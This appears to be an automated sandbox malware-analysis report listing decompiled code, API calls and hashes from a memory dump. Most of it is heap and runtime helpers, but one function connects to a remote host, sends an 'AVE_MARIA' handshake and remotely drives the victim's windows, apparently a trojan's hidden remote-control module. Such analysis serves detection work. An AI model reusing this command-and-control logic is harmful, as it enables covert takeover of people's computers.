Instruction ID: a8709b78549a8b08ae372e7cf0612a42bcb5402f8531655fa0e8e3048b9639dd
Opcode Fuzzy Hash: ec46a6c5c864c51f4e21e30cfd2dcdae9924df048e89885850573b8e7d46a410
Instruction Fuzzy Hash: 7DE01A32100158BBD7215F93DC09FDB7F6DEBCABA1F008019FA059506086315915C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00E9AE4B, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E9AE4B(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00E998AF(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00E9DC74(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00E964B8(0);
				return _t35;
			}

0x00e9ae51
0x00e9ae58
0x00e9ae5d
0x00e9ae61
0x00e9ae68
0x00e9ae6e
0x00e9ae6e
0x00e9ae74
0x00e9ae76
0x00e9ae79
0x00e9ae79
0x00e9ae7c
0x00e9ae7e
0x00e9ae84
0x00e9ae88
0x00e9ae8d
0x00e9ae91
0x00e9ae93
0x00e9ae96
0x00e9ae9c
0x00e9aea3
0x00e9aea7
0x00e9aeab
0x00e9aeae
0x00e9aeb1
0x00e9aeb1
0x00e9aeb5
0x00e9aeb8
0x00e9ae6a
0x00e9ae6a
0x00e9ae6a
0x00e9aeba
0x00e9aec7

APIs

Part of subcall function 00E998AF: RtlAllocateHeap.NTDLL(00000008,00E825BB,00000000,?,00E984AF,00000001,00000364,00000007,000000FF,?,00000000,00000002,00E95BC2,00E96F5F,00000000), ref: 00E998F0

_free.LIBCMT ref: 00E9AEBA

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 38082dfc9f628e9a655aa6aea789138162910ffc07eda6152a262ca736813909
Instruction ID: 2bd70bc80ff2982e5cd25897629c0b1b2a4deb1bf9e9083dda629ad4398fbe2e
Opcode Fuzzy Hash: 38082dfc9f628e9a655aa6aea789138162910ffc07eda6152a262ca736813909
Instruction Fuzzy Hash: 96010472A043166BC7309FA9C8859AAFB98EB05370F54026AE948B7680D7706C1487E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E998AF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E998AF(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xeaa9c4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00E94AF9();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00E95BBD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00E94B44(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00e998b5
0x00e998ba
0x00e998c8
0x00e998c8
0x00e998ce
0x00e998d0
0x00e998d0
0x00e998e7
0x00e998f0
0x00e998f8
0x00000000
0x00000000
0x00e998d8
0x00e998da
0x00e998fc
0x00e99901
0x00e99907
0x00000000
0x00e99907
0x00e998dd
0x00e998e3
0x00e998e5
0x00000000
0x00000000
0x00e998e5
0x00000000
0x00e998e7
0x00e998c0
0x00e998c6
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00E825BB,00000000,?,00E984AF,00000001,00000364,00000007,000000FF,?,00000000,00000002,00E95BC2,00E96F5F,00000000), ref: 00E998F0

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c5f5a05e5865729957f9c41ef1190b4ef803b613417453df99bd160d19d1b2b2
Instruction ID: ff18fa16b3968b6432575a42a6876f2292652cf74a35890a8f9b8569ab939a5a
Opcode Fuzzy Hash: c5f5a05e5865729957f9c41ef1190b4ef803b613417453df99bd160d19d1b2b2
Instruction Fuzzy Hash: 65F0B4326416256AEF356A6ADC09B5B7B889F83760B19602DA804B6182EA60D84186E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E96F1C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E96F1C(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00E95BBD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xeaa9c4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00E94AF9();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00E94B44(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00e96f22
0x00e96f28
0x00e96f5a
0x00e96f5f
0x00e96f65
0x00000000
0x00e96f65
0x00e96f2c
0x00e96f2e
0x00e96f2e
0x00e96f45
0x00e96f4e
0x00e96f56
0x00000000
0x00000000
0x00e96f36
0x00e96f38
0x00000000
0x00000000
0x00e96f3b
0x00e96f41
0x00e96f43
0x00000000
0x00000000
0x00e96f43
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00E9084B,00000002,?,?,?,00E824A9,00000000,0000002C,00E825BB), ref: 00E96F4E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1f8a45a3521df535069ec6868f8912e52565d587310ef4cdc52241efed6ff5c6
Instruction ID: 5a6c50467ad51006c4a102a32e2bf68c47afb4fb49a2e16a3220a4d8decef0e6
Opcode Fuzzy Hash: 1f8a45a3521df535069ec6868f8912e52565d587310ef4cdc52241efed6ff5c6
Instruction Fuzzy Hash: 0EE0E5323052155AEE312F66BC05FAE3688EB523A8F052163AD45B62D0EB60DC0181E4

Uniqueness

Uniqueness Score: -1.00%

Function 00E90985, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E90985(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E00E964B8(_a4); // executed
				return _t5;
			}

0x00e9098e
0x00e90998
0x00e909a1

APIs

_free.LIBCMT ref: 00E90998

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 539204b147195f509940479dbda494578400ec6dc542fe84ac0dddfc46da8b04
Instruction ID: 0cff933606b2c7830a60fa18bb4071b3ce4067c6fae3116aed8a7aec49793f84
Opcode Fuzzy Hash: 539204b147195f509940479dbda494578400ec6dc542fe84ac0dddfc46da8b04
Instruction Fuzzy Hash: 94C08C3140420CBBCF00EF85E806A5EBBACEB80320F604189FC0C57300DA72AE1096D1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A829, Relevance: 1.3, APIs: 1, Instructions: 32
sleepCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E8A829(void* __eflags, intOrPtr _a4) {
				void* _t11;
				signed int _t13;
				void* _t16;
				signed int _t18;
				intOrPtr _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t24;

				_t24 = __eflags;
				Sleep(0x64); // executed
				E00E90FD9(E00E8A7BF(_t24));
				 *_t23 = 0x104; // executed
				_t11 = E00E909A2(); // executed
				_t21 = _a4;
				_t16 = 0;
				_t22 = _t11;
				if(_t21 > 0) {
					do {
						_t13 = E00E90FB8();
						_t18 = 0x24;
						_t6 = _t13 % _t18 + "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"; // 0x33323130
						 *((char*)(_t16 + _t22)) =  *_t6;
						_t16 = _t16 + 1;
					} while (_t16 < _t21);
				}
				 *((char*)(_t22 + _t21)) = 0;
				return _t22;
			}

0x00e8a829
0x00e8a82e
0x00e8a83a
0x00e8a83f
0x00e8a846
0x00e8a84b
0x00e8a84f
0x00e8a851
0x00e8a856
0x00e8a858
0x00e8a858
0x00e8a861
0x00e8a864
0x00e8a86a
0x00e8a86d
0x00e8a86e
0x00e8a858
0x00e8a872
0x00e8a87b

APIs

Sleep.KERNELBASE(00000064,00000000,?,00000000,00E8A5C2,00000008,00000000,?,?,00000000,?,00E890E6,?,?,?,00000104), ref: 00E8A82E

Part of subcall function 00E8A7BF: GetSystemTime.KERNEL32(?,?,?,?,00E82EFB), ref: 00E8A7D3
Part of subcall function 00E8A7BF: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00E82EFB), ref: 00E8A7E1

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$System$FileSleep
String ID:
API String ID: 1465189569-0
Opcode ID: 18edb8aa9d5ca7fa9bcb0c89a5970085686e2ccf467d21191d0bf87c77cbc48b
Instruction ID: 7ff20c480fc4b95d79ad5e8d97669cda69b333a2c6b05e7fd06dbc85c6a0b5c0
Opcode Fuzzy Hash: 18edb8aa9d5ca7fa9bcb0c89a5970085686e2ccf467d21191d0bf87c77cbc48b
Instruction Fuzzy Hash: 9FF0A0263083414EE32437EA588961AABE5DFD6751F68107FF6CCBA282D6618C418372

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E85BB1, Relevance: 75.7, APIs: 37, Strings: 6, Instructions: 445
windownetworkthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00E85BB1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v24;
				char _v376;
				char _v404;
				struct _WINDOWPLACEMENT _v420;
				struct tagRECT _v436;
				struct tagRECT _v452;
				char _v454;
				short _v456;
				char _v460;
				char _v462;
				short _v464;
				char _v468;
				int _v476;
				signed int _v480;
				struct tagPOINT _v488;
				struct HWND__* _v492;
				long _v496;
				int _v500;
				long _v504;
				struct tagPOINT _v512;
				intOrPtr _v516;
				signed int _v520;
				intOrPtr _v524;
				void* __ebp;
				signed int _t119;
				int _t139;
				signed int _t140;
				signed int _t151;
				signed int _t154;
				unsigned int _t158;
				signed short _t160;
				struct HWND__* _t161;
				int _t162;
				int _t165;
				struct HMENU__* _t183;
				long _t189;
				struct tagPOINT _t198;
				long _t204;
				struct HWND__* _t206;
				long _t210;
				struct tagPOINT _t214;
				int _t215;
				CHAR* _t216;
				void* _t217;
				signed short _t218;
				intOrPtr _t220;
				int _t222;
				intOrPtr _t225;
				long _t227;
				intOrPtr _t228;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				struct HMENU__* _t240;
				intOrPtr* _t243;
				intOrPtr* _t245;
				struct HWND__* _t246;
				signed short _t247;
				int _t250;
				struct HWND__* _t251;
				int _t254;
				void* _t257;
				signed int _t258;
				signed int _t260;
				void* _t268;

				_t260 = (_t258 & 0xfffffff8) - 0x1a4;
				_t119 =  *0xea9014; // 0xa413846
				_v8 = _t119 ^ _t260;
				_push(__esi);
				_push(__edi);
				_t225 = E00E846F7(__edi, __esi);
				_v436.bottom = _t225;
				SetThreadDesktop( *0xeaae3c);
				_t243 = __imp__#19;
				_t204 = 0;
				_push(0);
				_push(0xa);
				_push("AVE_MARIA");
				_push(_t225);
				if( *_t243() <= 0) {
					L47:
					return E00E8AE43(_v24 ^ _t260);
				}
				_push(0);
				_push(4);
				_v420.ptMinPosition = 1;
				_push( &(_v420.ptMinPosition));
				_push(_t225);
				if( *_t243() <= 0) {
					goto L47;
				}
				_t245 = __imp__#16;
				_push(0);
				_push(4);
				_push( &_v404);
				_push(_t225);
				if( *_t245() == 0) {
					goto L47;
				}
				 *0xeaae34 = CreateThread(0, 0, E00E84798, 0, 0, 0);
				_v436.top = 0;
				_v452.right = 0;
				_v452.top = 0;
				_v452.bottom = 0;
				_v436.left = 0;
				E00E857CD(0, _t225, _t245, _t257);
				_push(0);
				_push(4);
				_push( &_v452);
				_push(_t225);
				if( *_t245() <= 0) {
					L46:
					TerminateThread( *0xeaae34, _t204);
					goto L47;
				}
				_t206 = _v452.bottom;
				while(1) {
					_push(0);
					_push(4);
					_push( &(_v452.right));
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_push(0);
					_push(4);
					_push( &_v488);
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_t139 = _v500;
					_v520 = 0;
					_t268 = _t139 - 0x404;
					if(_t268 > 0) {
						_t140 = _t139 - 0x405;
						__eflags = _t140;
						if(__eflags == 0) {
							E00E856CF(_t206, _t225, _t245, __eflags);
							L31:
							ScreenToClient(_t206,  &_v512);
							_push(_v512.y);
							_push(_v512.x);
							_push(_t206);
							while(1) {
								_t246 = ChildWindowFromPoint();
								if(_t246 == 0) {
									break;
								}
								__eflags = _t246 - _t206;
								if(__eflags == 0) {
									break;
								}
								_t206 = _t246;
								ScreenToClient(_t246,  &_v512);
								_push(_v512.y);
								_push(_v512.x);
								_push(_t246);
							}
							if(_v520 == 0) {
								_t210 = _v504;
							} else {
								_t210 = (_v512.y & 0x0000ffff) << 0x00000010 | _v512.x & 0x0000ffff;
								_v504 = _t210;
							}
							PostMessageA(_t206, _v500, _v476, _t210);
							L44:
							_t245 = __imp__#16;
							_push(0);
							_push(4);
							_push( &_v500);
							_push(_t225);
							if( *_t245() > 0) {
								continue;
							}
							break;
						}
						_t151 = _t140 - 1;
						__eflags = _t151;
						if(_t151 == 0) {
							E00E862A9();
							_t220 =  *0xeaae38; // 0x0
							E00E86268(0xeaad28, _t220);
							goto L47;
						}
						_t154 = _t151 - 1;
						__eflags = _t154;
						if(_t154 == 0) {
							E00E862A9();
							goto L47;
						}
						__eflags = _t154 - 1;
						if(__eflags == 0) {
							E00E84CEE(_t206, _t225, _t245, __eflags);
							goto L31;
						}
						L23:
						_t158 = _v504;
						_t227 = _v488.x;
						_t247 = _v488.y;
						_t214 = _t158;
						_t160 = _t158 >> 0x10;
						_push(_t160);
						_v520 = 1;
						_v512.x = _t214;
						_v512.y = _t160;
						_v488.x = _t214;
						_v488.y = _t160;
						_t161 = WindowFromPoint(_t214);
						__eflags = _v500 - 0x202;
						_t206 = _t161;
						if(_v500 != 0x202) {
							__eflags = _v500 - 0x201;
							if(_v500 != 0x201) {
								__eflags = _v500 - 0x200;
								if(__eflags != 0) {
									L30:
									_t225 = _v524;
									goto L31;
								}
								__eflags = _v480;
								if(__eflags == 0) {
									L43:
									_t225 = _v524;
									goto L44;
								}
								_t162 = _v492;
								__eflags = _t162;
								if(_t162 != 0) {
									_t206 = _t162;
								} else {
									_v496 = SendMessageA(_t206, 0x84, _t162, _v504);
								}
								_t228 = _t227 - _v512.x;
								_v520 = _t228;
								_v516 = _t247 - _v512.y;
								GetWindowRect(_t206,  &_v452);
								_t165 = _v452.left;
								_t222 = _v452.right - _t165;
								_t215 = _v452.top;
								_t250 = _v452.bottom - _t215;
								__eflags = _v496 - 0xd;
								if(__eflags > 0) {
									_t230 = _v496 - 0xe;
									__eflags = _t230;
									if(_t230 == 0) {
										_t215 = _t215 - _v516;
										_t250 = _t250 + _v516;
										__eflags = _t250;
										goto L75;
									}
									_t231 = _t230 - 1;
									__eflags = _t231;
									if(__eflags == 0) {
										_t250 = _t250 - _v516;
										goto L76;
									}
									_t232 = _t231 - 1;
									__eflags = _t232;
									if(_t232 == 0) {
										_t250 = _t250 - _v516;
										__eflags = _t250;
										goto L72;
									}
									__eflags = _t232 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t250 = _t250 - _v516;
									goto L75;
								} else {
									if(__eflags == 0) {
										_t215 = _t215 - _v516;
										_t165 = _t165 - _t228;
										_t250 = _t250 + _v516;
										_t222 = _t222 + _t228;
										L76:
										MoveWindow(_t206, _t165, _t215, _t222, _t250, 0);
										_v492 = _t206;
										goto L43;
									}
									_t236 = _v496;
									__eflags = _t236;
									if(__eflags == 0) {
										_t165 = _t165 - _v520;
										_t215 = _t215 - _v516;
										goto L76;
									}
									_t237 = _t236 - 8;
									__eflags = _t237;
									if(__eflags == 0) {
										L72:
										_t165 = _t165 - _v520;
										_t222 = _t222 + _v520;
										goto L76;
									}
									_t238 = _t237 - 1;
									__eflags = _t238;
									if(_t238 == 0) {
										L75:
										_t222 = _t222 - _v520;
										__eflags = _t222;
										goto L76;
									}
									__eflags = _t238 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t215 = _t215 - _v516;
									_t250 = _t250 + _v516;
									goto L76;
								}
							}
							__eflags = 0;
							_v480 = 1;
							_v492 = 0;
							_t216 = 0;
							_v468 = 0x37363402;
							_v464 = 0x2b2b;
							_v462 = 0;
							do {
								_t48 = _t216 + 0x40; // 0x40
								 *(_t260 + _t216 + 0x44) =  *(_t260 + _t216 + 0x44) ^ _t48;
								_t216 = _t216 + 1;
								__eflags = _t216 - 6;
							} while (_t216 < 6);
							_v462 = 0;
							_t251 = FindWindowA( &_v468, 0);
							GetWindowRect(_t251,  &_v436);
							_push(_v512.y);
							__eflags = PtInRect( &_v436, _v512.x);
							if(__eflags == 0) {
								E00E8D0F0(_t227,  &_v376, 0, 0x104);
								_t260 = _t260 + 0xc;
								RealGetWindowClassA(_t206,  &_v376, 0x104);
								_v460 = 0x74707263;
								_t217 = 0;
								__eflags = 0;
								_v456 = 0x7d72;
								_v454 = 0;
								do {
									_t67 = _t217 + 0x40; // 0x40
									 *(_t260 + _t217 + 0x4c) =  *(_t260 + _t217 + 0x4c) ^ _t67;
									_t217 = _t217 + 1;
									__eflags = _t217 - 6;
								} while (_t217 < 6);
								_t72 =  &_v460; // 0x74707263
								_v454 = 0;
								__eflags = lstrcmpA( &_v376, _t72);
								if(__eflags != 0) {
									goto L30;
								}
								_t183 = SendMessageA(_t206, 0x1e1, 0, 0);
								_push(_v512.y);
								_t240 = _t183;
								_t254 = MenuItemFromPoint(0, _t240, _v512.x);
								GetMenuItemID(_t240, _t254);
								PostMessageA(_t206, 0x1e5, _t254, 0);
								PostMessageA(_t206, 0x100, 0xd, 0);
								goto L43;
							}
							PostMessageA(_t251, 0xf5, 0, 0);
							goto L43;
						}
						_v480 = 0;
						_t189 = SendMessageA(_t206, 0x84, 0, _v504);
						__eflags = _t189 - 0xffffffff;
						if(__eflags == 0) {
							SetWindowLongA(_t206, 0xfffffff0, GetWindowLongA(_t206, 0xfffffff0) | 0x08000000);
							SendMessageA(_t206, 0x84, 0, _v504);
							goto L30;
						}
						__eflags = _t189 - 8;
						if(__eflags == 0) {
							_push(0);
							_push(0xf020);
							L34:
							_push(0x112);
							L29:
							PostMessageA(_t206, ??, ??, ??);
							goto L30;
						}
						__eflags = _t189 - 9;
						if(_t189 == 9) {
							_v420.length = 0x2c;
							GetWindowPlacement(_t206,  &_v420);
							__eflags = _v420.flags & 0x00000003;
							_push(0);
							if(__eflags == 0) {
								_push(0xf030);
							} else {
								_push(0xf120);
							}
							goto L34;
						}
						__eflags = _t189 - 0x14;
						if(__eflags != 0) {
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0x10);
						goto L29;
					}
					if(_t268 == 0) {
						E00E84F57(_t206, _t225, _t245, __eflags);
						goto L31;
					}
					if(_t139 < 0x100) {
						goto L23;
					}
					if(_t139 <= 0x102) {
						_t218 = _v488.y;
						_t198 = _v488;
						_push(_t218);
						_v512 = _t198;
						_v512.y = _t218;
						_t206 = WindowFromPoint(_t198);
						goto L31;
					}
					if(_t139 == 0x401) {
						E00E857CD(_t206, _t225, _t245, _t257);
						goto L31;
					}
					if(_t139 == 0x402) {
						CreateThread(0, 0, E00E85A71, 0, 0, 0);
						goto L31;
					}
					_t273 = _t139 - 0x403;
					if(_t139 != 0x403) {
						goto L23;
					}
					E00E84A91(_t206, _t225, _t245, _t257, _t273);
					goto L31;
				}
				_t204 = 0;
				goto L46;
			}

0x00e85bb7
0x00e85bbd
0x00e85bc4
0x00e85bcc
0x00e85bcd
0x00e85bd9
0x00e85bdb
0x00e85bdf
0x00e85be5
0x00e85beb
0x00e85bed
0x00e85bee
0x00e85bf0
0x00e85bf5
0x00e85bfa
0x00e85efc
0x00e85f12
0x00e85f12
0x00e85c00
0x00e85c01
0x00e85c07
0x00e85c0f
0x00e85c10
0x00e85c15
0x00000000
0x00000000
0x00e85c1b
0x00e85c25
0x00e85c26
0x00e85c28
0x00e85c29
0x00e85c2e
0x00000000
0x00000000
0x00e85c44
0x00e85c49
0x00e85c4d
0x00e85c51
0x00e85c55
0x00e85c59
0x00e85c5d
0x00e85c62
0x00e85c63
0x00e85c69
0x00e85c6a
0x00e85c6f
0x00e85eef
0x00e85ef6
0x00000000
0x00e85ef6
0x00e85c75
0x00e85c79
0x00e85c79
0x00e85c7b
0x00e85c81
0x00e85c82
0x00e85c87
0x00000000
0x00000000
0x00e85c8d
0x00e85c8f
0x00e85c95
0x00e85c96
0x00e85c9b
0x00000000
0x00000000
0x00e85ca1
0x00e85cac
0x00e85cb0
0x00e85cb2
0x00e85d2f
0x00e85d2f
0x00e85d34
0x00e860e2
0x00e85dd4
0x00e85dda
0x00e85de0
0x00e85de4
0x00e85de8
0x00e86107
0x00e8610d
0x00e86111
0x00000000
0x00000000
0x00e860ec
0x00e860ee
0x00000000
0x00000000
0x00e860f4
0x00e860f8
0x00e860fe
0x00e86102
0x00e86106
0x00e86106
0x00e86118
0x00e8612f
0x00e8611a
0x00e86127
0x00e86129
0x00e86129
0x00e8613d
0x00e85ed3
0x00e85ed3
0x00e85edd
0x00e85edf
0x00e85ee1
0x00e85ee2
0x00e85ee7
0x00000000
0x00000000
0x00000000
0x00e85ee7
0x00e85d3a
0x00e85d3a
0x00e85d3d
0x00e86152
0x00e86157
0x00e86162
0x00000000
0x00e86162
0x00e85d43
0x00e85d43
0x00e85d46
0x00e86148
0x00000000
0x00e86148
0x00e85d4c
0x00e85d4f
0x00e860d8
0x00000000
0x00e860d8
0x00e85d55
0x00e85d55
0x00e85d59
0x00e85d5d
0x00e85d61
0x00e85d67
0x00e85d68
0x00e85d6a
0x00e85d72
0x00e85d76
0x00e85d7a
0x00e85d7e
0x00e85d82
0x00e85d88
0x00e85d90
0x00e85d92
0x00e85e4c
0x00e85e54
0x00e85fce
0x00e85fd6
0x00e85dd0
0x00e85dd0
0x00000000
0x00e85dd0
0x00e85fdc
0x00e85fe1
0x00e85ecf
0x00e85ecf
0x00000000
0x00e85ecf
0x00e85fe7
0x00e85feb
0x00e85fed
0x00e86006
0x00e85fef
0x00e86000
0x00e86000
0x00e86008
0x00e86016
0x00e8601a
0x00e8601e
0x00e8602c
0x00e86030
0x00e86032
0x00e86036
0x00e86038
0x00e8603d
0x00e86084
0x00e86084
0x00e86087
0x00e860b6
0x00e860ba
0x00e860ba
0x00000000
0x00e860ba
0x00e86089
0x00e86089
0x00e8608c
0x00e860b0
0x00000000
0x00e860b0
0x00e8608e
0x00e8608e
0x00e86091
0x00e860a2
0x00e860a2
0x00000000
0x00e860a2
0x00e86093
0x00e86096
0x00000000
0x00000000
0x00e8609c
0x00000000
0x00e8603f
0x00e8603f
0x00e86072
0x00e86076
0x00e86078
0x00e8607c
0x00e860c2
0x00e860c9
0x00e860cf
0x00000000
0x00e860cf
0x00e86046
0x00e86046
0x00e86049
0x00e86068
0x00e8606c
0x00000000
0x00e8606c
0x00e8604b
0x00e8604b
0x00e8604e
0x00e860a6
0x00e860a6
0x00e860aa
0x00000000
0x00e860aa
0x00e86050
0x00e86050
0x00e86053
0x00e860be
0x00e860be
0x00e860be
0x00000000
0x00e860be
0x00e86055
0x00e86058
0x00000000
0x00000000
0x00e8605e
0x00e86062
0x00000000
0x00e86062
0x00e8603d
0x00e85e5a
0x00e85e5c
0x00e85e64
0x00e85e68
0x00e85e6a
0x00e85e72
0x00e85e79
0x00e85e7d
0x00e85e7d
0x00e85e80
0x00e85e84
0x00e85e85
0x00e85e85
0x00e85e8f
0x00e85e9a
0x00e85ea2
0x00e85ea8
0x00e85ebb
0x00e85ebd
0x00e85f25
0x00e85f2a
0x00e85f37
0x00e85f3d
0x00e85f45
0x00e85f45
0x00e85f47
0x00e85f4e
0x00e85f53
0x00e85f53
0x00e85f56
0x00e85f5a
0x00e85f5b
0x00e85f5b
0x00e85f60
0x00e85f64
0x00e85f78
0x00e85f7a
0x00000000
0x00000000
0x00e85f8a
0x00e85f90
0x00e85f94
0x00e85fa2
0x00e85fa6
0x00e85fbb
0x00e85fc7
0x00000000
0x00e85fc7
0x00e85ec9
0x00000000
0x00e85ec9
0x00e85dab
0x00e85daf
0x00e85db1
0x00e85db4
0x00e85e37
0x00e85e48
0x00000000
0x00e85e48
0x00e85db6
0x00e85db9
0x00e85e1d
0x00e85e1e
0x00e85e0f
0x00e85e0f
0x00e85dc9
0x00e85dca
0x00000000
0x00e85dca
0x00e85dbb
0x00e85dbe
0x00e85df2
0x00e85dfc
0x00e85e02
0x00e85e07
0x00e85e08
0x00e85e16
0x00e85e0a
0x00e85e0a
0x00e85e0a
0x00000000
0x00e85e08
0x00e85dc0
0x00e85dc3
0x00000000
0x00000000
0x00e85dc5
0x00e85dc6
0x00e85dc7
0x00000000
0x00e85dc7
0x00e85cb4
0x00e85d25
0x00000000
0x00e85d25
0x00e85cbb
0x00000000
0x00000000
0x00e85cc6
0x00e85d06
0x00e85d0a
0x00e85d0e
0x00e85d10
0x00e85d14
0x00e85d1e
0x00000000
0x00e85d1e
0x00e85ccd
0x00e85cfc
0x00000000
0x00e85cfc
0x00e85cd4
0x00e85cf1
0x00000000
0x00e85cf1
0x00e85cd6
0x00e85cdb
0x00000000
0x00000000
0x00e85cdd
0x00000000
0x00e85cdd
0x00e85eed
0x00000000

APIs

Part of subcall function 00E846F7: WSAStartup.WS2_32(00000202,?), ref: 00E84718
Part of subcall function 00E846F7: socket.WS2_32(00000002,00000001,00000000), ref: 00E84729
Part of subcall function 00E846F7: gethostbyname.WS2_32(00EAAD28), ref: 00E8473B
